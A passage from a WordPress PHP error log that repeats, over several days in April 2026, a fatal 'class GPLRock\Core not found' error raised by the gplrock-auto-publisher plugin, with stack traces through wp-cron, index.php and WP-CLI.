/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-blog-header.php(13): require_once('/home/masterro/...') #7 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/index.php(17): require('/home/masterro/...') #8 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [13-Apr-2026 12:23:53 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-blog-header.php(13): require_once('/home/masterro/...') #7 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/index.php(17): require('/home/masterro/...') #8 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [13-Apr-2026 12:33:04 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-blog-header.php(13): require_once('/home/masterro/...') #7 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/index.php(17): require('/home/masterro/...') #8 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [14-Apr-2026 00:43:17 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [14-Apr-2026 00:43:17 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [14-Apr-2026 00:43:19 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [14-Apr-2026 00:43:22 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [14-Apr-2026 00:48:54 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [15-Apr-2026 00:46:14 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [15-Apr-2026 00:46:14 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [15-Apr-2026 00:46:16 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [15-Apr-2026 00:46:20 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [15-Apr-2026 00:51:51 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [16-Apr-2026 00:53:18 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [16-Apr-2026 00:53:18 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [16-Apr-2026 00:53:21 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [16-Apr-2026 00:53:24 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [16-Apr-2026 00:59:48 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [17-Apr-2026 00:51:59 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in 